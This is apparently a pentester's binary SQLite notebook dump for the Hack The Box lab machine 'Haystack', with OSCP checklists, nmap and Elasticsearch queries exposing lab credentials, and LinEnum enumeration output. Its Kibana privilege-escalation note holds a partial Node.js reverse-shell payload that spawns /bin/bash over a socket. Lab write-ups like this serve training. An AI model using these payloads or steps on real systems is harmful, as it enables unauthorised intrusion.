SQLite format 3@ r-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1. nmap -sC -sV -oA ./haystack 10.10.10.115 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 21:51 EDT Nmap scan rerv)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk#'  Enumerationcustom-colors*A?&s.=u oo$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2i '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad <<k9'   OtherElastic Search Running on 9200 http://10.10.10.115:9200 provides a JSON response letting us know that this is using Elastic Search. name "iQEYHgS" cluster_name "elasticsearch" cluster_uuid "pjrX7V_gSFmJY-DxP4tCQg" version number "6.4.2" build_flavor "default" build_type "rpm" build_hash "04711c2" build_date "2018-09-26T13:34:09.098244Z" build_snapshot false lucene_version "7.4.0" minimum_wire_compatibility_version "5.6.0" minimum_index_compatibility_version "5.0.0" tagline "You Know, for Search" http://10.10.10.115:9200/_cat/indices?v health status  Vkv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnn'%w'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,A[AF OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^^OOg'  Goodiescustom-colorsVA?& c+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA[; k)c'  Scheduled JobsScheduled Taskscustom-colors$ANl &&Ng'  Goodiescustom-colorsVA?& cf+o'   Priv EscalationService Exploited: Kibana Vulnerability Type: LFI Exploit POC: https://github.com/mpgn/CVE-2018-17246 Description: Malicious JS for Privesc from Security to Kibana user Discovery of Vulnerability Listening port 5601 in LinEnum.sh Exploit Code Used (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/bash", []); var client = new net.Socket(); client.connect(9999, &gich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,  (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Software Versions Potential Exploitscustom-colorsANlH{xx!;' 10.10.10.115 - Haystackcustom-colorsAסI^h  ' Log Bookcustom-colors(AI^index uuid pri rep docs.count docs.deleted store.size pri.store.size green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb http://10.10.10.115:9200/quotes/_search?size=253 cat output.txt | jq '.hits.hits | .[] | ._source.quote' | grep ‘:’ Lines 25 and 29 "Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg " "Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=" "I have to save the password for the machine: user: security " "This key cannot be lost, I keep it here: pass: spanish.is.key custom-colorsA[EϯAסІH #X/]'  Running ProcessesESC[00;31m#########################################################ESC[00m ESC[00;31m#ESC[00m ESC[00;33mLocal Linux Enumeration & Privilege Escalation ScriptESC[00m ESC[00;31m#ESC[00m ESC[00;31m#########################################################ESC[00m ESC[00;33m# Operating System Architecture Domain Installed Updates custom-colors$A[4*_text>www.rebootuser.comESC[00m ESC[00;33m# version 0.982ESC[00m [-] Debug Info [+] Thorough tests = Enabled ESC[00;33mScan started at: Fri Apr 3 11:36:27 -03 2020 ESC[00m ESC[00;33m### SYSTEM ##############################################ESC[00m ESC[00;31m[-] Kernel information:ESC[00m Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ESC[00;31m[-] Kernel information (continued):ESC[00m Linux version 3.10.0-957.1.3.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Thu Nov 29 14:49:43 UTC 2018 ESC[00;31m[-] Specific release information:ESC[00m CentOS Linux release 7.6.1810 (Core) NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI_COLOR="0;31" CPE_NAME=";cpe:/o:centos:centos:7" HOME_URL="https://www.centos.org/" BUG_REPORT_URL="https://bugs.centos.org/" CENTOS_MANTISBT_PROJECT="CentOS-7" CENTOS_MANTISBT_PROJECT_VERSION="7" REDHAT_SUPPORT_PRODUCT="centos" REDHAT_SUPPORT_PRODUCT_VERSION="7" CentOS Linux release 7.6.1810 (Core) CentOS Linux release 7.6.1810 (Core) ESC[00;31m[-] Hostname:ESC[00m haystack ESC[00;33m### USER/GROUP ##########################################ESC[00m ESC[00;31m[-] Current user/group info:ESC[00m uid=1000(security) gid=1000(security) groups=1000(security) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 ESC[00;31m[-] Users that have previously logged onto the system:ESC[00m Username Port From Latest root tty1 Tue Aug 27 04:34:59 -0400 2019 security pts/0 10.10.14.28 Fri Apr 3 11:11:02 -0300 2020 ESC[00;31m[-] Who else is logged on:ESC[00m 11:36:27 up 12:47, 1 user, load average: 0.03, 0.04, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT security pts/0 10.10.14.28 11:11 3.00s 0.04s 0.00s /bin/bash ./linenum.sh -t ESC[00;31m[-] Group memberships:ESC[00m uid=0(root) gid=0(root) groups=0(root) uid=1(bin) gid=1(bin) groups=1(bin) uid=2(daemon) gid=2(daemon) groups=2(daemon) uid=3(adm) gid=4(adm) groups=4(adm) uid=4(lp) gid=7(lp) groups=7(lp) uid=5(sync) gid=0(root) groups=0(root) uid=6(shutdown) gid=0(root) groups=0(root) uid=7(halt) gid=0(root) groups=0(root) uid=8(mail) gid=12(mail) groups=12(mail) uid=11(operator) gid=0(root) groups=0(root) uid=12(games) gid=100(users) groups=100(users) uid=14(ftp) gid=50(ftp) groups=50(ftp) uid=99(nobody) gid=99(nobody) groups=99(nobody) uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network) uid=81(dbus) gid=81(dbus) groups=81(dbus) uid=999(polkitd) gid=998(polkitd) groups=998(polkitd) uid=74(sshd) gid=74(sshd) groups=74(sshd) uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail) uid=998(chrony) gid=996(chrony) groups=996(chrony) uid=1000(security) gid=1000(security) groups=1000(security) uid=997(elasticsearch) gid=995(elasticsearch) groups=995(elasticsearch) uid=996(logstash) gid=994(logstash) groups=994(logstash) uid=995(nginx) gid=993(nginx) groups=993(nginx) uid=994(kibana) gid=992(kibana) groups=992(kibana) ESC[00;31m[-] It looks like we have some admin users:ESC[00m uid=3(adm) gid=4(adm) groups=4(adm) ESC[00;31m[-] Contents of /etc/passwd:ESC[00m root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:996::/var/lib/chrony:/sbin/nologin security:x:1000:1000:security:/home/security:/bin/bash elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin ESC[00;31m[-] Super user account(s):ESC[00m root ESC[00;31m[-] Are permissions on /home directories lax:ESC[00m total 0 drwxr-xr-x. 3 root root 22 Nov 28 2018 . dr-xr-xr-x. 17 root root 224 Nov 28 2018 .. drwx------. 2 security security 115 Apr 3 11:36 security ESC[00;31m[-] Files owned by our user:ESC[00m -rw-rw----. 1 security mail 0 Nov 28 2018 /var/spool/mail/security -rw-rw-r--. 1 security security 4968 Apr 3 11:36 /tmp/output.txt -rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh -rw-r--r--. 1 security security 18 Apr 10 2018 /home/security/.bash_logout -rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile -rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc -rw-r--r--. 1 security security 33 Feb 6 2019 /home/security/user.txt -rw-------. 1 security security 668 Apr 3 11:36 /home/security/.viminfo ESC[00;31m[-] Hidden files:ESC[00m -rw-r--r--. 1 root root 166 Apr 20 2018 /boot/.vmlinuz-3.10.0-862.el7.x86_64.hmac -rw-r--r--. 1 root root 171 Sep 26 2018 /boot/.vmlinuz-3.10.0-862.14.4.el7.x86_64.hmac -rw-r--r--. 1 root root 170 Nov 29 2018 /boot/.vmlinuz-3.10.0-957.1.3.el7.x86_64.hmac -rw-r--r--. 1 root ro!ot 0 Apr 2 22:49 /run/initramfs/.need_shutdown -rw-r--r--. 1 root root 18 Oct 30 2018 /etc/skel/.bash_logout -rw-r--r--. 1 root root 193 Oct 30 2018 /etc/skel/.bash_profile -rw-r--r--. 1 root root 231 Oct 30 2018 /etc/skel/.bashrc -rw-------. 1 root root 0 Nov 28 2018 /etc/.pwd.lock -rw-r--r--. 1 root root 129 Nov 28 2018 /etc/selinux/targeted/.policy.sha512 -rw-r--r--. 1 root root 163 Nov 28 2018 /etc/.updated -rw-r--r--. 1 root root 0 Nov 28 2018 /var/lib/rpm/.dbenv.lock -rw-r--r--. 1 root root 0 Nov 28 2018 /var/lib/rpm/.rpm.lock -rw-r--r--. 1 logstash logstash 0 Nov 28 2018 /var/lib/logstash/.lock -rw-r--r--. 1 logstash logstash 0 Dec 10 2018 /var/lib/logstash/plugins/inputs/file/.sincedb_8e34207134c38bd3a174c97e36bf853b -rw-r--r--. 1 root root 0 Nov 28 2018 /var/cache/yum/x86_64/7/.gpgkeyschecked.yum -rw-r--r--. 1 root root 163 Nov 28 2018 /var/.updated -rw-r--r--. 1 root root 65 Oct 30 2018 /usr/lib64/.libcrypto.so.1.0.2k.hmac -rw-r--r--. 1 root root 65 Oct 30 2018 /usr/lib64/.libssl."so.1.0.2k.hmac -rw-r--r--. 1 root root 65 Aug 2 2017 /usr/lib64/.libgcrypt.so.11.hmac -rw-r--r--. 1 root root 40 Oct 30 2018 /usr/share/man/man1/..1.gz -rw-r--r--. 1 root root 42 Nov 2 2018 /usr/share/man/man5/.k5identity.5.gz -rw-r--r--. 1 root root 39 Nov 2 2018 /usr/share/man/man5/.k5login.5.gz -rw-r--r--. 1 root root 36 Dec 11 2018 /usr/share/X11/fonts/Type1/.uuid -rw-r--r--. 1 root root 2328 Apr 23 2013 /usr/share/kde4/apps/kdm/themes/CentOS7/.colorlsCZ1 -rw-r--r--. 1 root root 140 Jan 23 2019 /usr/share/vim/vimfiles/.netrwhist -rw-r--r--. 1 root root 36 Dec 11 2018 /usr/share/fonts/stix/.uuid -rw-r--r--. 1 root root 36 Dec 11 2018 /usr/share/fonts/dejavu/.uuid -rw-r--r--. 1 root root 36 Dec 11 2018 /usr/share/fonts/.uuid -rw-r--r--. 1 logstash logstash 0 Nov 30 2018 /usr/share/logstash/data/.lock -rw-r--r--. 1 root root 1464 Sep 26 2018 /usr/share/kibana/node_modules/@elastic/eui/node_modules/uuid/.eslintrc.json -rw-r--r--. 1 root root 376 Sep 26 2018 /usr/share/kibana/node_modules/@#elastic/eui/.eslintrc.json -rw-r--r--. 1 root root 63 Sep 26 2018 /usr/share/kibana/node_modules/acorn/.tern-project -rw-r--r--. 1 root root 439 Sep 26 2018 /usr/share/kibana/node_modules/ajv/.tonic_example.js -rw-r--r--. 1 root root 5 Sep 26 2018 /usr/share/kibana/node_modules/aws4/.tern-port -rw-rw-r--. 1 root root 1160 Sep 26 2018 /usr/share/kibana/node_modules/color-name/.eslintrc.json -rw-r--r--. 1 root root 304 Sep 26 2018 /usr/share/kibana/node_modules/console-browserify/.testem.json -rw-r--r--. 1 root root 304 Sep 26 2018 /usr/share/kibana/node_modules/date-now/.testem.json -rw-r--r--. 1 root root 1623 Sep 26 2018 /usr/share/kibana/node_modules/des.js/.jscsrc -rw-r--r--. 1 root root 59 Sep 26 2018 /usr/share/kibana/node_modules/error-ex/node_modules/is-arrayish/.istanbul.yml -rw-r--r--. 1 root root 291 Sep 26 2018 /usr/share/kibana/node_modules/es-abstract/.nycrc -rw-r--r--. 1 root root 37 Sep 26 2018 /usr/share/kibana/node_modules/es5-ext/promise/.eslintrc.json -rw-r--r--. 1 root root 1$49 Sep 26 2018 /usr/share/kibana/node_modules/graphlib-dot/.jscsrc -rw-r--r--. 1 root root 149 Sep 26 2018 /usr/share/kibana/node_modules/graphlib/.jscsrc -rw-r--r--. 1 root root 46 Sep 26 2018 /usr/share/kibana/node_modules/handlebars/.istanbul.yml -rw-r--r--. 1 root root 80 Sep 26 2018 /usr/share/kibana/node_modules/has-symbol-support-x/.eslintrc.json -rw-r--r--. 1 root root 6 Sep 26 2018 /usr/share/kibana/node_modules/has-symbol-support-x/.nvmrc -rw-r--r--. 1 root root 268 Sep 26 2018 /usr/share/kibana/node_modules/has-symbol-support-x/.uglifyjsrc.json -rw-rw-r--. 1 root root 80 Sep 26 2018 /usr/share/kibana/node_modules/has-to-string-tag-x/.eslintrc.json -rw-rw-r--. 1 root root 6 Sep 26 2018 /usr/share/kibana/node_modules/has-to-string-tag-x/.nvmrc -rw-rw-r--. 1 root root 268 Sep 26 2018 /usr/share/kibana/node_modules/has-to-string-tag-x/.uglifyjsrc.json -rw-r--r--. 1 root root 45 Sep 26 2018 /usr/share/kibana/node_modules/hjson/bin/.eslintrc.json -rw-r--r--. 1 root root 316 Sep 26 2018 /us%r/share/kibana/node_modules/hjson/.eslintrc.json -rw-r--r--. 1 root root 178 Sep 26 2018 /usr/share/kibana/node_modules/http-signature/.dir-locals.el -rw-r--r--. 1 root root 1623 Sep 26 2018 /usr/share/kibana/node_modules/ip/.jscsrc -rw-r--r--. 1 root root 59 Sep 26 2018 /usr/share/kibana/node_modules/is-arrayish/.istanbul.yml -rw-r--r--. 1 root root 307 Sep 26 2018 /usr/share/kibana/node_modules/is-object/.testem.json -rw-r--r--. 1 root root 5 Sep 26 2018 /usr/share/kibana/node_modules/is-symbol/.nvmrc -rw-rw-r--. 1 root root 43 Sep 26 2018 /usr/share/kibana/node_modules/jade/.release.json -rw-r--r--. 1 root root 60 Sep 26 2018 /usr/share/kibana/node_modules/jquery/src/.eslintrc.json -rw-r--r--. 1 root root 3132 Sep 26 2018 /usr/share/kibana/node_modules/less/.jscsrc -rw-rw-r--. 1 root root 312 Sep 26 2018 /usr/share/kibana/node_modules/min-document/.testem.json -rw-r--r--. 1 root root 101 Sep 26 2018 /usr/share/kibana/node_modules/object-inspect/.ignored-tmp.js -rw-r--r--. 1 root root 273 Sep &26 2018 /usr/share/kibana/node_modules/object-inspect/.nycrc -rw-r--r--. 1 root root 193 Sep 26 2018 /usr/share/kibana/node_modules/performance-now/.tm_properties -rw-rw-r--. 1 root root 5768 Sep 26 2018 /usr/share/kibana/node_modules/pngjs/.eslintrc.json -rw-r--r--. 1 root root 501 Sep 26 2018 /usr/share/kibana/node_modules/polished/.babelrc.js -rw-r--r--. 1 root root 35 Sep 26 2018 /usr/share/kibana/node_modules/proxy-from-env/.jscsrc -rw-r--r--. 1 root root 7960 Sep 26 2018 /usr/share/kibana/node_modules/querystring/.History.md.un~ -rw-r--r--. 1 root root 3225 Sep 26 2018 /usr/share/kibana/node_modules/querystring/.Readme.md.un~ -rw-r--r--. 1 root root 5710 Sep 26 2018 /usr/share/kibana/node_modules/querystring/.package.json.un~ -rw-r--r--. 1 root root 193 Sep 26 2018 /usr/share/kibana/node_modules/raf/node_modules/performance-now/.tm_properties -rw-r--r--. 1 root root 69 Sep 26 2018 /usr/share/kibana/node_modules/react-grid-layout/.flowconfig -rw-r--r--. 1 root root 800 Sep 26 2018 /usr/sha're/kibana/node_modules/react-resizable/.flowconfig -rw-rw-r--. 1 root root 3669 Sep 26 2018 /usr/share/kibana/node_modules/remarkable/.eslintrc.json -rw-rw-r--. 1 root root 0 Sep 26 2018 /usr/share/kibana/node_modules/remarkable/.nojekyll -rw-r--r--. 1 root root 193 Sep 26 2018 /usr/share/kibana/node_modules/request/node_modules/performance-now/.tm_properties -rw-r--r--. 1 root root 1464 Sep 26 2018 /usr/share/kibana/node_modules/request/node_modules/uuid/.eslintrc.json -rw-rw-r--. 1 root root 82 Sep 26 2018 /usr/share/kibana/node_modules/serve/node_modules/handlebars/.istanbul.yml -rw-r--r--. 1 root root 547 Sep 26 2018 /usr/share/kibana/node_modules/stream-http/.airtap.yml -rw-rw-r--. 1 root root 1310 Sep 26 2018 /usr/share/kibana/node_modules/svgo/.svgo.yml -rw-r--r--. 1 root root 221 Sep 26 2018 /usr/share/kibana/node_modules/tether/.hsdoc -rw-r--r--. 1 root root 439 Sep 26 2018 /usr/share/kibana/node_modules/uglifyjs-webpack-plugin/node_modules/ajv/.tonic_example.js -rw-r--r--. 1 root root 1(5 Sep 26 2018 /usr/share/kibana/node_modules/update-check/.yarnrc -rw-r--r--. 1 root root 206 Sep 26 2018 /usr/share/kibana/node_modules/vega-tooltip/.prettierrc.json -rw-r--r--. 1 root root 116 Sep 26 2018 /usr/share/kibana/node_modules/vega-typings/.prettierrc.yml -rw-r--r--. 1 root root 206 Sep 26 2018 /usr/share/kibana/node_modules/venn.js/.eslintrc.json -rw-rw-r--. 1 root root 0 Sep 26 2018 /usr/share/kibana/node_modules/webcola/dist/.baseDir.d.ts -rw-rw-r--. 1 root root 36 Sep 26 2018 /usr/share/kibana/node_modules/webcola/dist/.baseDir.js -rw-rw-r--. 1 root root 112 Sep 26 2018 /usr/share/kibana/node_modules/webcola/dist/.baseDir.js.map -rw-r--r--. 1 root root 2 Sep 26 2018 /usr/share/kibana/node_modules/with/node_modules/acorn/.tern-project -rw-rw-r--. 1 root root 252123 Sep 26 2018 /usr/share/kibana/node_modules/.yarn-integrity -rw-rw-r--. 1 kibana kibana 11234463 Apr 2 22:49 /usr/share/kibana/optimize/.babelcache.json -rw-r--r--. 1 security security 18 Apr 10 2018 /home/security/.bash)_logout -rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile -rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc -rw-------. 1 security security 668 Apr 3 11:36 /home/security/.viminfo ESC[00;31m[-] World-readable files within /home:ESC[00m -rw-r--r--. 1 security security 18 Apr 10 2018 /home/security/.bash_logout -rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile -rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc -rw-r--r--. 1 security security 33 Feb 6 2019 /home/security/user.txt ESC[00;31m[-] Home directory contents:ESC[00m total 20K drwx------. 2 security security 115 Apr 3 11:36 . drwxr-xr-x. 3 root root 22 Nov 28 2018 .. lrwxrwxrwx. 1 root root 9 Jan 25 2019 .bash_history -> /dev/null -rw-r--r--. 1 security security 18 Apr 10 2018 .bash_logout -rw-r--r--. 1 security security 193 Apr 10 2018 .bash_profile -rw-r--r--. 1 security security 231 Apr 10 2018 .bashrc -rw-r--r--.* 1 security security 33 Feb 6 2019 user.txt -rw-------. 1 security security 668 Apr 3 11:36 .viminfo ESC[00;33m### ENVIRONMENTAL #######################################ESC[00m ESC[00;31m[-] Environment information:ESC[00m XDG_SESSION_ID=14 HOSTNAME=haystack SELINUX_ROLE_REQUESTED= SHELL=/bin/bash TERM=xterm-256color HISTSIZE=1000 SSH_CLIENT=10.10.14.28 42226 22 SELINUX_USE_CURRENT_RANGE= SSH_TTY=/dev/pts/0 USER=security PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/security/.local/bin:/home/security/bin MAIL=/var/spool/mail/security PWD=/tmp LANG=en_US.utf8 SELINUX_LEVEL_REQUESTED= HISTCONTROL=ignoredups HOME=/home/security SHLVL=2 LOGNAME=security SSH_CONNECTION=10.10.14.28 42226 10.10.10.115 22 LESSOPEN=||/usr/bin/lesspipe.sh %s XDG_RUNTIME_DIR=/run/user/1000 _=/usr/bin/env ESC[00;31m[-] SELinux seems to be present:ESC[00m SELinux status: enabled SELinuxfs mount: /sys/fs/selinux SELinux root directory: /etc/selinux Loaded policy name: + targeted Current mode: permissive Mode from config file: permissive Policy MLS status: enabled Policy deny_unknown status: allowed Max kernel policy version: 31 ESC[00;31m[-] Path information:ESC[00m /usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/security/.local/bin:/home/security/bin dr-xr-xr-x. 2 root root 24576 Aug 27 2019 /usr/bin drwxr-xr-x. 2 root root 6 Apr 11 2018 /usr/local/bin drwxr-xr-x. 2 root root 6 Apr 11 2018 /usr/local/sbin dr-xr-xr-x. 2 root root 12288 Aug 27 2019 /usr/sbin ESC[00;31m[-] Available shells:ESC[00m /bin/sh /bin/bash /usr/bin/sh /usr/bin/bash ESC[00;31m[-] Current umask value:ESC[00m 0002 u=rwx,g=rwx,o=rx ESC[00;31m[-] umask value as specified in /etc/login.defs:ESC[00m UMASK 077 ESC[00;31m[-] Password and storage information:ESC[00m PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ESC[00;33m### JOBS/TASKS ##########################################ESC,[00m ESC[00;31m[-] Cron jobs:ESC[00m -rw-------. 1 root root 0 Nov 20 2018 /etc/cron.deny -rw-r--r--. 1 root root 451 Jun 9 2014 /etc/crontab /etc/cron.d: total 16 drwxr-xr-x. 2 root root 21 Dec 11 2018 . drwxr-xr-x. 85 root root 8192 Aug 27 2019 .. -rw-r--r--. 1 root root 128 Nov 20 2018 0hourly /etc/cron.daily: total 20 drwxr-xr-x. 2 root root 42 Dec 11 2018 . drwxr-xr-x. 85 root root 8192 Aug 27 2019 .. -rwx------. 1 root root 219 Oct 30 2018 logrotate -rwxr-xr-x. 1 root root 618 Oct 30 2018 man-db.cron /etc/cron.hourly: total 16 drwxr-xr-x. 2 root root 22 Dec 11 2018 . drwxr-xr-x. 85 root root 8192 Aug 27 2019 .. -rwxr-xr-x. 1 root root 392 Nov 20 2018 0anacron /etc/cron.monthly: total 12 drwxr-xr-x. 2 root root 6 Jun 9 2014 . drwxr-xr-x. 85 root root 8192 Aug 27 2019 .. /etc/cron.weekly: total 12 drwxr-xr-x. 2 root root 6 Jun 9 2014 . drwxr-xr-x. 85 root root 8192 Aug 27 2019 .. ESC[00;31m[-] Crontab contents:ESC[00m SHELL=/bin/bash PATH=/sbin:/bin-:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed ESC[00;31m[-] Anacron jobs and associated file permissions:ESC[00m -rw-------. 1 root root 541 Nov 20 2018 /etc/anacrontab ESC[00;31m[-] When were jobs last executed (/var/spool/anacron contents):ESC[00m total 12 drwxr-xr-x. 2 root root 63 Nov 20 2018 . drwxr-xr-x. 8 root root 87 Nov 28 2018 .. -rw-------. 1 root root 9 Apr 3 03:08 cron.daily -rw-------. 1 root root 9 Apr 3 03:21 cron.monthly -rw-------. 1 root root 9 Apr 3 03:01 cron.weekly ESC[00;31m[-] Systemd timers:ESC[00m NEXT LEFT LAST PASSED UNIT . ACTIVATES Fri 2020-04-03 23:04:24 -03 11h left Thu 2020-04-02 23:04:24 -03 12h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service n/a n/a n/a n/a systemd-readahead-done.timer systemd-readahead-done.service 2 timers listed. ESC[00;33m### NETWORKING ##########################################ESC[00m ESC[00;31m[-] Network and IP info:ESC[00m 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000 link/ether 00:50:56:b9:3a:7b brd ff:ff:ff:ff:ff:ff inet 10.10.10.115/24 brd 10.10.10.255 scope global ens33 valid_lft forever preferred_lft forever inet/6 dead:beef::250:56ff:feb9:3a7b/64 scope global mngtmpaddr dynamic valid_lft 86363sec preferred_lft 14363sec inet6 fe80::250:56ff:feb9:3a7b/64 scope link valid_lft forever preferred_lft forever ESC[00;31m[-] ARP history:ESC[00m 169.254.169.254 dev ens33 FAILED 10.10.10.2 dev ens33 lladdr 00:50:56:b9:f9:ab REACHABLE fe80::250:56ff:feb9:f9ab dev ens33 lladdr 00:50:56:b9:f9:ab router STALE ESC[00;31m[-] Nameserver(s):ESC[00m nameserver 192.168.2.2 ESC[00;31m[-] Default route:ESC[00m default via 10.10.10.2 dev ens33 ESC[00;31m[-] Listening TCP:ESC[00m State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 128 *:80 *:* LISTEN 0 128 *:9200 *:* LISTEN 0 128 *:22 *:* LISTEN 0 128 127.0.0.1:5601 *:* LISTEN 0 128 0 ::ffff:127.0.0.1:9000 :::* LISTEN 0 128 :::80 :::* LISTEN 0 128 ::ffff:127.0.0.1:9300 :::* LISTEN 0 128 :::22 :::* LISTEN 0 50 ::ffff:127.0.0.1:9600 :::* ESC[00;31m[-] Listening UDP:ESC[00m State Recv-Q Send-Q Local Address:Port Peer Address:Port UNCONN 0 0 127.0.0.1:323 *:* UNCONN 0 0 ::1:323 :::* ESC[00;33m### SERVICES #############################################ESC[00m ESC[00;31m[-] Running processes:ESC[00m USER PID %CPU %MEM VSZ RSS 